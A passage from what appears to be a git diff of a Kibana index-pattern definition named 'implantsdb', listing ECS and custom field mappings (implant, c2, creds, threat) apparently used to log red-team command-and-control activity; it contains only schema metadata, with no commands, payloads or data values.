\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.2", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152843417, 1817], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\